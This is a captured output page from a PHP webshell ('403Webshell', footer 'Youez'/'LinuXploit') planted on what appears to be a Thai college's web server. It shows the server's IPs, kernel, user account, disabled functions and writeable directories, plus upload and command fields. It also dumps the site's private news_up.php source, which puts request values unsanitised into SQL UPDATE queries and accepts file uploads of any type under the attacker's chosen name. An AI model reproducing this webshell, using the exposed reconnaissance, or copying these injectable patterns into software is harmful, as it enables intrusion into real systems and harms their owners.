403Webshell
Server IP : 27.254.66.5  /  Your IP : 216.73.217.39
Web Server : Apache/2
System : Linux cs82.hostneverdie.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
User : technic2 ( 1951)
PHP Version : 7.4.30
Disable Function : apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd,exec, fp, fput, highlight_file, ini_alter, ini_restore, inject_code, passthru,phpAds_remoteInfo, phpAds_XmlRpc,phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,posix_setuid, posix_setuid, posix_uname,proc_open,proc_close, proc_get_status, proc_nice, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode, show_source,sleep,pcntl_exec,virtual,suexec,dbmopen,dl,symlink,disk_free_space,diskfreespace,leak
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/technic2/domains/technicrayong.ac.th/private_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/technic2/domains/technicrayong.ac.th/private_html/news_up.php
<?php
include('connect.php'); 

	if(isset($_GET['news_id'])){$news_id=$_GET['news_id'];}
	if(isset($_POST['news_id'])){$news_id=$_POST['news_id'];}
	if(isset($_GET['news_date'])){$news_date=$_GET['news_date'];}
	if(isset($_POST['news_date'])){$news_date=$_POST['news_date'];}
	if(isset($_GET['news_h'])){$news_h=$_GET['news_h'];}
	if(isset($_POST['news_h'])){$news_h=$_POST['news_h'];}
	if(isset($_GET['details'])){$details=$_GET['details'];}
	if(isset($_POST['details'])){$details=$_POST['details'];}
	if(isset($_GET['news_file'])){$news_file=$_GET['news_file'];}
	if(isset($_POST['news_file'])){$news_file=$_POST['news_file'];}
	if(isset($_GET['news_h1'])){$news_h1=$_GET['news_h1'];}
	if(isset($_POST['news_h1'])){$news_h1=$_POST['news_h1'];}
	if(isset($_GET['news_h2'])){$news_h2=$_GET['news_h2'];}
	if(isset($_POST['news_h2'])){$news_h2=$_POST['news_h2'];}
	if(isset($_GET['news_h3'])){$news_h3=$_GET['news_h3'];}
	if(isset($_POST['news_h3'])){$news_h3=$_POST['news_h3'];}
	if(isset($_GET['news_h4'])){$news_h4=$_GET['news_h4'];}
	if(isset($_POST['news_h4'])){$news_h4=$_POST['news_h4'];}
	if(isset($_GET['news_h5'])){$news_h5=$_GET['news_h5'];}
	if(isset($_POST['news_h5'])){$news_h5=$_POST['news_h5'];}
	if(isset($_GET['news_h6'])){$news_h6=$_GET['news_h6'];}
	if(isset($_POST['news_h6'])){$news_h6=$_POST['news_h6'];}
	if(isset($_GET['news_h7'])){$news_h7=$_GET['news_h7'];}
	if(isset($_POST['news_h7'])){$news_h7=$_POST['news_h7'];}
	if(isset($_GET['news_h8'])){$news_h8=$_GET['news_h8'];}
	if(isset($_POST['news_h8'])){$news_h8=$_POST['news_h8'];}
	if(isset($_GET['news_h9'])){$news_h9=$_GET['news_h9'];}
	if(isset($_POST['news_h9'])){$news_h9=$_POST['news_h9'];}
	if(isset($_GET['news_h10'])){$news_h10=$_GET['news_h10'];}
	if(isset($_POST['news_h10'])){$news_h10=$_POST['news_h10'];}
	if(isset($_GET['news_link1'])){$news_link1=$_GET['news_link1'];}
	if(isset($_POST['news_link1'])){$news_link1=$_POST['news_link1'];}
	if(isset($_GET['news_link2'])){$news_link2=$_GET['news_link2'];}
	if(isset($_POST['news_link2'])){$news_link2=$_POST['news_link2'];}
	if(isset($_GET['news_link3'])){$news_link3=$_GET['news_link3'];}
	if(isset($_POST['news_link3'])){$news_link3=$_POST['news_link3'];}
	if(isset($_GET['news_link4'])){$news_link4=$_GET['news_link4'];}
	if(isset($_POST['news_link4'])){$news_link4=$_POST['news_link4'];}
	if(isset($_GET['news_link5'])){$news_link5=$_GET['news_link5'];}
	if(isset($_POST['news_link5'])){$news_link5=$_POST['news_link5'];}
	if(isset($_GET['news_link6'])){$news_link6=$_GET['news_link6'];}
	if(isset($_POST['news_link6'])){$news_link6=$_POST['news_link6'];}
	if(isset($_GET['news_link7'])){$news_link7=$_GET['news_link7'];}
	if(isset($_POST['news_link7'])){$news_link7=$_POST['news_link7'];}
	if(isset($_GET['news_link8'])){$news_link8=$_GET['news_link8'];}
	if(isset($_POST['news_link8'])){$news_link8=$_POST['news_link8'];}
	if(isset($_GET['news_link9'])){$news_link9=$_GET['news_link9'];}
	if(isset($_POST['news_link9'])){$news_link9=$_POST['news_link9'];}
	if(isset($_GET['news_link10'])){$news_link10=$_GET['news_link10'];}
	if(isset($_POST['news_link10'])){$news_link10=$_POST['news_link10'];}
	if(isset($_GET['usr_id'])){$usr_id=$_GET['usr_id'];}
	if(isset($_POST['usr_id'])){$usr_id=$_POST['usr_id'];}

	if($_POST){
	    if(isset($_FILES['upload'])){
	        $name_file =  $_FILES['upload']['name'];
	        $tmp_name =  $_FILES['upload']['tmp_name'];
	        $locate_img ="pdf/";
	        move_uploaded_file($tmp_name,$locate_img.$name_file);
	    }
	}
	
	$count = strlen($name_file);
	if($count != 0){
	$sqls = "UPDATE news SET news_h='$news_h',news_date='$news_date',news_detail ='$details',news_file ='$name_file',news_h1 ='$news_h1',
	news_h2 ='$news_h2',news_h3 ='$news_h3',news_h4 ='$news_h4',news_h5 ='$news_h5',news_h6 ='$news_h6',news_h7 ='$news_h7',news_h8 ='$news_h8'
	,news_h9 ='$news_h9',news_h10 ='$news_h10',news_link1 ='$news_link1',news_link2 ='$news_link2',news_link3 ='$news_link3',news_link4 ='$news_link4'
	,news_link5 ='$news_link5',news_link6 ='$news_link6',news_link7 ='$news_link7',news_link8 ='$news_link8',news_link9 ='$news_link9'
	,news_link10 ='$news_link10'
	WHERE news_id='$news_id'"; 
	$results=mysqli_query($conn,$sqls); 
	if($results==1){
					echo "<script language=\"javascript\">";
					echo "alert(\"New Events has been successfully added.\")";
					echo "</script>";
					header("location:admin_page.php?usr_id=$usr_id");
			
			}
	}else{
	$sqls = "UPDATE news SET news_h='$news_h',news_date='$news_date',news_detail ='$details',news_file ='$news_file',news_h1 ='$news_h1',
	news_h2 ='$news_h2',news_h3 ='$news_h3',news_h4 ='$news_h4',news_h5 ='$news_h5',news_h6 ='$news_h6',news_h7 ='$news_h7',news_h8 ='$news_h8'
	,news_h9 ='$news_h9',news_h10 ='$news_h10',news_link1 ='$news_link1',news_link2 ='$news_link2',news_link3 ='$news_link3',news_link4 ='$news_link4'
	,news_link5 ='$news_link5',news_link6 ='$news_link6',news_link7 ='$news_link7',news_link8 ='$news_link8',news_link9 ='$news_link9'
	,news_link10 ='$news_link10' 
	WHERE news_id='$news_id'"; 
	$results=mysqli_query($conn,$sqls); 
	if($results==1){
					echo "<script language=\"javascript\">";
					echo "alert(\"New Events has been successfully added.\")";
					echo "</script>";
					header("location:admin_page.php?usr_id=$usr_id");
			
			}
		
	}
	?>

Youez - 2016 - github.com/yon3zu
LinuXploit